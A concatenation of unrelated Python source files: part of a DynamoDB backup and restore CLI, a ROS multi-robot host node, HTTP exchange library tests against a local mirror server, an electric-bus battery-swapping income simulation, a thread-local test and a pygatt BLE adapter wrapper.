wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(destination_table,
global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if (e.body["__type"] ==
"com.amazonaws.dynamodb.v20120810#LimitExceededException"):
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif (e.body["__type"] ==
"com.amazon.coral.availability#ThrottlingException"):
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
host=args.host,
port=int(args.port),
is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
robot_host.py
|
#!/usr/bin/python3
import math
import rospy
import rostopic
import rosnode
import copy
import threading
from geometry_msgs.msg import PoseStamped
from nics_robot_host.srv import *
from rospy.core import rospyinfo
class RobotHost(object):
def __init__(self, args, env):
# get agent number from env
self.agent_num = len(env.world.vehicle_list)
# init host node
rospy.init_node("robot_host")
# TODO get this param from launch file
self.core_fps = 10
# check the number of agent client
All_ready = False
while not All_ready:
node_name_list:list[str] = rosnode.get_node_names()
self.vehicle_id_list = []
for node_name in node_name_list:
if node_name.endswith('robot_client'):
# assume all robot_client note named as '/XXXX/vehicle_id/robot_client'
self.vehicle_id_list.append(node_name.split('/')[-2])
if len(self.vehicle_id_list) == self.agent_num:
All_ready = True
break
print(self.vehicle_id_list)
rospy.sleep(0.5)
#build observation services
self.obs_server_list = []
for vehicle_id in self.vehicle_id_list:
obs_messenger = rospy.Service(name='/'+vehicle_id+'/get_obs',
service_class=obs,
handler= (lambda a:lambda msg: self.obs_calculate(msg, a))(vehicle_id,))
self.obs_server_list.append(obs_messenger)
# update the agent data_interface
self.env = env
new_interface = {}
for vehicle_idx in range(self.agent_num):
vehicle_id = self.vehicle_id_list[vehicle_idx]
vehicle = self.env.world.vehicle_list[vehicle_idx]
old_id = vehicle.vehicle_id
vehicle.vehicle_id = vehicle_id
new_interface[vehicle_id] = self.env.world.data_interface.pop(old_id)
self.env.world.data_interface = new_interface
# waiting for all topic
self.ros_data_interface = {}
for vehicle_id in self.vehicle_id_list:
ros_data = {}
for data_name in ['pose','scan']:
ros_data[data_name] = False
self.ros_data_interface[vehicle_id] = ros_data
print(ros_data)
#check for all topic
rospyinfo('check for all topic ready')
all_data_interface_ready = False
while not all_data_interface_ready:
all_data_interface_ready = True
for v_id, inter in self.ros_data_interface.items():
for data_name,state in inter.items():
if state is False:
print('/'+v_id+'/'+ data_name + ' is not found')
all_data_interface_ready = False
topic_list = rospy.get_published_topics()
for topic in topic_list:
topic_name:str = topic[0]
topic_name_split = topic_name.split('/')
v_id = topic_name_split[1]
if v_id in self.ros_data_interface.keys():
data_name = topic_name_split[2]
if data_name in self.ros_data_interface[v_id]:
self.ros_data_interface[v_id][data_name] = True
rospy.sleep(1.0)
self.ros_data_interface_sub = []
#subscribe all ros data interface
for vehicle_id in self.vehicle_id_list:
for data_name in self.ros_data_interface[vehicle_id].keys():
# handle = lambda msg: store_data_2(msg, self.ros_data_interface, vehicle_id, data_name)
topic_name = '/'+vehicle_id+'/'+data_name
data_class = rostopic.get_topic_class(topic_name)[0]
sub = rospy.Subscriber(name = '/'+vehicle_id+'/'+data_name,
data_class=data_class,
callback=self.store_data,
callback_args=(vehicle_id, data_name))
self.ros_data_interface_sub.append(sub)
for sub in self.ros_data_interface_sub:
print('sub_name',sub.name)
#check for all client control services
self.client_ctrl_srv = []
for vehicle_id in self.vehicle_id_list:
client_ctrl_name = '/'+vehicle_id+'/client_control'
rospy.wait_for_service(client_ctrl_name)
self.client_ctrl_srv.append(rospy.ServiceProxy(client_ctrl_name,sup))
self.ros_spin_thread = threading.Thread(target=rospy.spin)
self.ros_spin_thread.setDaemon(True)
self.ros_spin_thread.start()
state_flag = 'wait for pos'
while True:
cmd = input('state is %s, waiting for cmd '%state_flag)
if state_flag == 'wait for pos':
if cmd == 'pos':
self.env.reset()
while True:
result = self.waiting_for_vehicle()
if result is True:
rospy.loginfo('all agent is ready')
break
else:
rospy.loginfo(result)
rospy.sleep(0.1)
state_flag = 'wait for start'
rospy.loginfo('pos mode reset')
if cmd == 'random':
self.env.reset()
for agent in self.env.world.vehicle_list:
ros_data_interface = self.ros_data_interface[agent.vehicle_id]
agent.state.coordinate[0] = ros_data_interface['pose'].twist.linear.x
agent.state.coordinate[1] = ros_data_interface['pose'].twist.linear.y
agent.state.theta = ros_data_interface['pose'].twist.angular.z
state_flag = 'wait for start'
rospy.loginfo('random mode reset')
if cmd == 'start' and state_flag == 'wait for start':
state_flag = 'start'
rospy.loginfo('start!')
self.core_thread = threading.Thread(target=self.core_function)
self.core_thread.setDaemon(True)
self.core_thread.start()
for idx in range(len(self.vehicle_id_list)):
sup_arg = supRequest()
sup_arg.start = True
sup_arg.movable = True
sup_arg.collision = False
self.client_ctrl_srv[idx](sup_arg)
if cmd == 'exit':
rospy.signal_shutdown('exit')
break
def waiting_for_vehicle(self):
def near_enough(x, y, yaw, x_t, y_t, yaw_t):
#not near_enough distance of agent and the reset agent larger than 0.01m
if ((x-x_t)**2 + (y-y_t)**2)**0.5 > 0.01:
return False
#if yaw and yaw_t distance is larger than 5 degree
sin_con = math.sin(abs(yaw - yaw_t))<math.sin(5/180*3.1415)
cos_con = math.cos(abs(yaw - yaw_t))>math.cos(5/180*3.1415)
if not(sin_con and cos_con):
return False
return True
for agent in self.env.world.vehicle_list:
ros_data_interface = self.ros_data_interface[agent.vehicle_id]
x_t = agent.state.coordinate[0]
y_t = agent.state.coordinate[1]
yaw_t = agent.state.theta
x = ros_data_interface['pose'].twist.linear.x
y = ros_data_interface['pose'].twist.linear.y
yaw = ros_data_interface['pose'].twist.angular.z
if not near_enough(x,y,yaw,x_t,y_t,yaw_t):
info_str = "%s pos is (%f, %f, %f) but (%f, %f, %f) is required" %(agent.vehicle_id, x,y,yaw, x_t,y_t,yaw_t)
return info_str
return True
def store_data(self, msg, args):
v_id = args[0]
data_name = args[1]
self.ros_data_interface[v_id][data_name] = copy.deepcopy(msg)
def obs_calculate(self,req,vehicle_id):
rospy.loginfo("Calculate obs for car %s",vehicle_id)
car_index = self.vehicle_id_list.index(vehicle_id)
agent = self.env.world.vehicle_list[car_index]
obs_result = self.env._get_obs(agent)
return obsResponse(obs_result)
def core_function(self):
self.start_time = rospy.get_time()
rate = rospy.Rate(self.core_fps)
while True:
old_movable_list = copy.deepcopy([v.state.movable for v in self.env.world.vehicle_list])
total_time = rospy.get_time() - self.start_time
self._update_data_interface()
self.env.ros_step(total_time)
for v_idx in range(self.agent_num):
v = self.env.world.vehicle_list[v_idx]
if not(v.state.movable == old_movable_list[v_idx]):
sup_arg = supRequest()
sup_arg.start = True
sup_arg.movable = v.state.movable
sup_arg.collision = v.state.crashed
self.client_ctrl_srv[v_idx](sup_arg)
rate.sleep()
def _update_data_interface(self):
for vehicle_idx in range(self.agent_num):
vehicle_id = self.vehicle_id_list[vehicle_idx]
data_interface = self.env.world.data_interface[vehicle_id]
ros_data_interface = self.ros_data_interface[vehicle_id]
data_interface['x'] = ros_data_interface['pose'].twist.linear.x
data_interface['y'] = ros_data_interface['pose'].twist.linear.y
data_interface['theta'] = ros_data_interface['pose'].twist.angular.z
data_interface['lidar'] = ros_data_interface['scan'].ranges
|
test_exchange.py
|
import unittest
from multiprocessing import Process
import requests
import json
import time
from ..exchange import Exchange
from ..config import DefaultConfig
from ..auth import Auth
from ..error import TimeoutError,ResponseError
from grabbag.list import first_not_none
from grabbag.dict import merge
TEST_METHODS = ('GET','POST','PUT','DELETE')
TEST_DATAS = ('','{"json":true}','<html></html>')
TEST_PARAMS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
TEST_HEADERS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
class TestAuth(Auth): pass
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = '/blah/v1'
sub_path = 'mirror/create'
def process_response(self, response): return json.loads(response.content)
class TestExchange2(Exchange): pass
def webserver():
from bottle import route, run, request, error
@route('/blah/v1/mirror/:extra', method='GET')
def get(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='POST')
def post(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='PUT')
def putextra(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='DELETE')
def delete(extra): return mirror(extra)
@error(404)
def bad(code): return 'bad'
@route('/sleep/:ms', method='GET')
def sleep(ms):
time.sleep(int(ms)/1000.0)
return json.dumps( {'sleep': ms} )
def mirror(extra):
return json.dumps( dict(
method = request.method,
protocol = request.urlparts[0],
domain = request.urlparts[1],
path = request.urlparts[2],
body = request.body.getvalue(),
params = dict((k,request.query.getall(k)) for k in request.query.keys()),
headers = dict((k,request.headers.get(k)) for k in request.headers.keys())))
run(host='localhost', port=8087)
class ExchangeTest(unittest.TestCase):
@classmethod
def setUpClass(kls):
kls.webserver_process = Process(target=webserver)
kls.webserver_process.start()
working = False
while not working:
time.sleep(0.02)
try:
working = requests.get('http://localhost:8087/blah/v1/mirror/whatever').status_code == 200
except: pass
@classmethod
def tearDownClass(kls):
kls.webserver_process.terminate()
kls.webserver_process.join()
def setUp(self): pass
def tearDown(self): pass
def _test_expected_attr(self, attr, possibles, default=None, add_none=True, final_possibles=None):
final_possibles = list(final_possibles or possibles)
if add_none:
possibles = [None] + list(possibles)
final_possibles = [None] + list(final_possibles)
for k,x in zip(possibles,final_possibles):
for l in (True, False):
for m,z in zip(possibles,final_possibles):
for n,w in zip(possibles, final_possibles):
class TestExchangeX(TestExchange2): pass
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
auth = Auth()
if n is not None: setattr(auth,attr,n)
self.assertEquals(default if n is None else n, getattr(auth,attr,None))
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals(first_not_none( (z,x,w), default), getattr(ex, attr))
def _test_additive_attr(self, attr, possibles, add_none=True):
if add_none:
possibles = [None] + list(possibles)
for k in possibles:
for l in (True,False):
for m in possibles:
for n in possibles:
class TestExchangeX(TestExchange): pass
auth = Auth()
setattr(auth,attr,n)
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals( merge({}, n or {}, k or {}, m or {}), getattr(ex, attr))
def test_calcs(self):
self._test_expected_attr('method', TEST_METHODS, DefaultConfig.method)
self._test_expected_attr('protocol', ('http','https'), DefaultConfig.protocol)
self._test_expected_attr('domain', ('app.localhost','app.hubspotqa.com','app.hubspot.com'), add_none=False)
self._test_expected_attr('base_path', ('/v1/whatever/','/base/path','') , None, final_possibles=('v1/whatever','base/path',None))
self._test_expected_attr('sub_path', ('/create','','show/'), None, final_possibles=('create',None,'show'))
self._test_expected_attr('data', TEST_DATAS)
self._test_expected_attr('timeout', (10,20,30), DefaultConfig.timeout)
self._test_expected_attr('max_retries', (0,1,2), DefaultConfig.max_retries)
###TODO: make it possible to use params as they can be used (i.e. multiple values per key -- i.e. MultiDict)
self._test_additive_attr('params', TEST_PARAMS)
self._test_additive_attr('headers', TEST_HEADERS)
def test_timeouts(self):
self.assertTrue(TestExchange(TestAuth(), timeout=0.5).result)
with self.assertRaises(TimeoutError):
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001).result)
def test_methods(self):
for method in TEST_METHODS:
self.assertEquals(method, TestExchange(TestAuth(), method=method).result['method'])
def test_datas(self):
for data in TEST_DATAS:
self.assertEquals(data, TestExchange(TestAuth(), data=data).result['body'])
def test_sub_paths(self):
for sub_path in ('create','show','list'):
self.assertEquals("/blah/v1/mirror/%s"%sub_path, TestExchange(TestAuth(), base_path='blah/v1/mirror', sub_path=sub_path).result['path'])
def test_params(self):
for params in TEST_PARAMS:
self.assertEquals(dict((k,[v]) for k,v in params.iteritems()), TestExchange(TestAuth(), params=params).result['params'])
def test_headers(self):
for headers in TEST_HEADERS:
self.assertEquals(dict((k.upper(),v) for k,v in headers.iteritems()), dict((k.upper(),v) for k,v in TestExchange(TestAuth(), headers=headers).result['headers'].iteritems() if k.lower() in headers.keys()))
def test_max_retries(self):
for max_retries in (0,1,2):
try:
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001, max_retries=max_retries).result)
except TimeoutError as err:
self.assertEquals(max_retries+1, len(err.exchange.failures))
for f in err.exchange.failures:
self.assertTrue(isinstance(f, TimeoutError))
continue
except:
self.fail("should not get to here")
self.fail("should not get to here")
def test_bulk_exchange(self):
count = 5
for async in (True,False):
exs = [TestExchange(TestAuth(), params={'i':str(i), 'async':str(async)}) for i in xrange(count)]
for ex,i in zip(Exchange.async_exchange(exs), xrange(count)):
self.assertEquals([str(i)],ex.result['params']['i'])
self.assertEquals([str(async)],ex.result['params']['async'])
def test_different_auth(self):
class TestAuth1(Auth):
def params(self): return {'key1':'value1'}
class TestAuth2(Auth):
def params(self): return {'key2':'value2'}
class TestExchange1(Exchange): pass
class TestExchange2(Exchange): pass
self.assertEquals({'key1':'value1'},TestExchange1(TestAuth1()).params)
self.assertEquals({'key2':'value2'},TestExchange1(TestAuth2()).params)
def test_bad_url(self):
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = 'bad'
ok404 = True
def process_error(self, error, response):
if response is not None:
if response.status_code==404:
return self.ok404
return False
def process_response(self, response): return response.text
self.assertEquals('bad',TestExchange(TestAuth()).result)
TestExchange.ok404=False
with self.assertRaises(ResponseError):
self.assertTrue(TestExchange(TestAuth()).result)
|
timeToSaturation.py
|
from simulationClasses import DCChargingStations, Taxi, Bus, BatterySwappingStation
import numpy as np
import pandas as pd
from scipy import stats, integrate
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from matplotlib.dates import DateFormatter, HourLocator, MinuteLocator, AutoDateLocator
import seaborn as sns
import csv
import sys
from datetime import datetime,date,timedelta
import random
from math import ceil
import math
import multiprocessing
def simulateBusDCChargingStationIncome(numberOfDCCharger, numberOfBuses, movingSpeed):
chargerCost = 15000*numberOfDCCharger
chargerCost = 0
busChargingStation = DCChargingStations(numberOfDCCharger)
busFleet = []
for i in range(numberOfBuses):
newBus = Bus()
newBus.useSwapping = 0
newBus.normalSpeed = movingSpeed
busFleet.append(newBus)
time = 0
busIncome = []
busChargerIncome = []
while time < 24 * 60 * 30:
todayBusIncome = 0
tempBusFleet = []
for runningBus in busFleet:
runningBus.decideChargeMode(time)
if runningBus.chargingMode == 1:
busChargingStation.addCharge(runningBus)
else:
runningBus.getTravelSpeed(time)
tempBusFleet.append(runningBus)
busFleet = tempBusFleet
tempChargingVehicles = []
for chargingBus in busChargingStation.chargingVehicles:
chargingBus.decideChargeMode(time)
if chargingBus.chargingMode == 0:
chargingBus.getTravelSpeed(time)
busFleet.append(chargingBus)
else:
chargingBus.charge(time, 0, busChargingStation.chargeSpeed)
tempChargingVehicles.append(chargingBus)
busChargingStation.chargingVehicles = tempChargingVehicles
while busChargingStation.numberOfStations - len(busChargingStation.chargingVehicles) > 0:
if len(busChargingStation.pendingVehicles) > 0:
newChargeBus = busChargingStation.pendingVehicles.pop(0)
newChargeBus.charge(time, 0, busChargingStation.chargeSpeed)
busChargingStation.chargingVehicles.append(newChargeBus)
else:
break
busChargingStation.charge()
for bus in busFleet + busChargingStation.chargingVehicles + busChargingStation.pendingVehicles:
todayBusIncome += bus.income
busIncome.append([time, todayBusIncome, len(busFleet), len(busChargingStation.chargingVehicles),
len(busChargingStation.pendingVehicles)])
busChargerIncome.append([time, busChargingStation.income])
time += 1
return busIncome[-1][1]*6,busChargerIncome[-1][1]*6-chargerCost
def simulateBusSwapperIncome(numberOfSlot, numberOfBuses, busSpeed):
swapperInitCost = 2.5*(10**6)
swapperSlotCost = 5000 * (numberOfSlot-1)
totalSwapperCost = swapperInitCost+swapperSlotCost
totalSwapperCost = 0
busSwappingStation = BatterySwappingStation(numberOfSlot, 324)
busFleet = []
for i in range(numberOfBuses):
newBus = Bus()
newBus.useSwapping = 1
newBus.normalSpeed = busSpeed
busFleet.append(newBus)
time = 0
busIncome = []
busSwapperIncome = []
while time < 24 * 60 * 30:
todayBusIncome = 0
tempBusFleet = []
for runningBus in busFleet:
runningBus.decideChargeMode(time)
if runningBus.chargingMode == 1:
result = busSwappingStation.addVehicle(runningBus)
if result > 0:
runningBus.charge(time, result, 0)
busSwappingStation.swappingVehicles.append(runningBus)
else:
runningBus.getTravelSpeed(time)
tempBusFleet.append(runningBus)
busFleet = tempBusFleet
tempSwappingVehicles = []
for swappingBus in busSwappingStation.swappingVehicles:
swappingBus.charge(time, 0, 0)
if swappingBus.chargingMode == 0:
swappingBus.getTravelSpeed(time)
busFleet.append(swappingBus)
else:
tempSwappingVehicles.append(swappingBus)
busSwappingStation.swappingVehicles = tempSwappingVehicles
while len(busSwappingStation.pendingVehicles) > 0:
if len(busSwappingStation.swappingVehicles) < busSwappingStation.numberOfSlot:
newBus = busSwappingStation.pendingVehicles.pop(0)
result = busSwappingStation.swap(newBus.remainingBatterykWh)
newBus.charge(time, result, 0)
busSwappingStation.swappingVehicles.append(newBus)
else:
break
for bus in busFleet + busSwappingStation.swappingVehicles + busSwappingStation.pendingVehicles:
todayBusIncome += bus.income
busIncome.append([time, todayBusIncome, len(busFleet), len(busSwappingStation.swappingVehicles),
len(busSwappingStation.pendingVehicles), \
len(busFleet) + len(busSwappingStation.swappingVehicles) + len(
busSwappingStation.pendingVehicles)])
busSwapperIncome.append([time, busSwappingStation.income])
time += 1
return busIncome[-1][1]*6,busSwapperIncome[-1][1]*6-totalSwapperCost
def iterate(iteration):
taxiChargerIncome = []
busChargerIncome = []
taxiSwappingIncome = []
busSwappingIncome = []
taxiDCChargerIncome = []
taxiSwapperIncome = []
busDCChargerIncome = []
busSwapperIncome = []
j_previous_charge = 50
j_previous_swap = 200
for i in range(10,45,1):
# previousBusCharger = 0.001
# for j in range(j_previous_charge - 25, j_previous_charge+67, 1):
# thisBusCharger, thisBusDCCharger = simulateBusDCChargingStationIncome(24, j, i)
# if abs(thisBusCharger - previousBusCharger)/previousBusCharger < 0.005:
# break
# else:
# previousBusCharger = thisBusCharger
# j_previous_charge = j
# busChargerIncome.append([i, j])
# busDCChargerIncome.append([i, j])
previousBusSwapper = 0.001
for j in range(j_previous_swap - 20, j_previous_swap + 67, 1):
thisBusSwap, thisBusSwapper = simulateBusSwapperIncome(2, j, i)
print(thisBusSwap)
if abs(thisBusSwapper - previousBusSwapper)/previousBusSwapper < 0.005:
break
else:
previousBusSwapper = thisBusSwapper
j_previous_swap = j
busSwappingIncome.append([i, j])
busSwapperIncome.append([i, j])
# busChargerIncomeDataFrame = pd.DataFrame(busChargerIncome,columns=["number","income"])
busSwappingIncomeDataFrame = pd.DataFrame(busSwappingIncome,columns=["number","income"])
# busDCChargerIncomeDataFrame = pd.DataFrame(busDCChargerIncome,columns=["number","income"])
busSwapperIncomeDataFrame = pd.DataFrame(busSwapperIncome,columns=["number","income"])
# busChargerIncomeDataFrame.to_pickle("busChargerIncomeDataFrame"+str(iteration)+".pkl")
busSwappingIncomeDataFrame.to_pickle("busSwappingIncomeDataFrame"+str(iteration)+".pkl")
# busDCChargerIncomeDataFrame.to_pickle("busDCChargerIncomeDataFrame"+str(iteration)+".pkl")
busSwapperIncomeDataFrame.to_pickle("busSwapperIncomeDataFrame"+str(iteration)+".pkl")
for i in range(30):
p = multiprocessing.Process(target=iterate, args=(i,))
p.start()
|
testLocal.py
|
# -*- coding:utf-8 -*-
import unittest
import time
from threading import Thread
from tindo import Local
class TestLocal(unittest.TestCase):
def testSingle(self):
local = Local()
local.name = 'gaofeng'
local.age = 12
self.assertEqual(local.name, 'gaofeng')
self.assertEqual(local.age, 12)
del local.name
with self.assertRaises(AttributeError):
local.name
def modify(self, ctx):
time.sleep(1)
ctx.name = 'subThread'
def testMultiThread(self):
ctx = Local()
ctx.name = 'main'
t = Thread(target=self.modify, args=(ctx,))
t.start()
t.join()
self.assertEqual(ctx.name, 'main')
if __name__ == '__main__':
unittest.main()
|
test-ble-adapter.py
|
# !usr/bin/python
# coding:utf-8
# Need pygatt tool for BLE communication:
# https://github.com/peplin/pygatt
import time
import pygatt
import threading
from pygatt import BLEDevice
class BLEAdapter:
def __init__(self):
self.remote_devices_type = pygatt.BLEAddressType.random
self.adapter = pygatt.GATTToolBackend()
self.adapter.start()
self.remote_devices = ""
def scan_remote_devices(self):
self.remote_devices = self.adapter.scan()
return self.remote_devices
def _scan_device(self, remote_devices, device_name):
for i in range(len(remote_devices)):
for key, value in remote_devices[i].items():
if value == device_name:
remote_device = remote_devices[i]
device_address = remote_device.get("address")
return device_address
def get_device_address(self, device_name):
if self.remote_devices == "":
self.scan_remote_devices()
device_address = self._scan_device(self.remote_devices, device_name)
return device_address
def connect_device(self, address):
device_con = self.adapter.connect(address, address_type = self.remote_devices_type)
return device_con
class RemoteBLEDevice:
def __init__(self, con_device):
self.con_device = con_device
self.characteristics = self.con_device.discover_characteristics()
def get_uuid_and_handle(self, uuid_short):
for key, value in self.characteristics.items():
if uuid_short in value.uuid:
char_uuid_full = value.uuid
char_handle = value.handle
return char_uuid_full, char_handle
def read_value(self, uuid_full):
value = (self.con_device.char_read(uuid_full)).decode("utf-8")
return value
def write_value(self, handle, value):
self.con_device.char_write_handle(handle, bytearray(value, "utf-8"))
def device_bond(self):
self.con_device.bond()
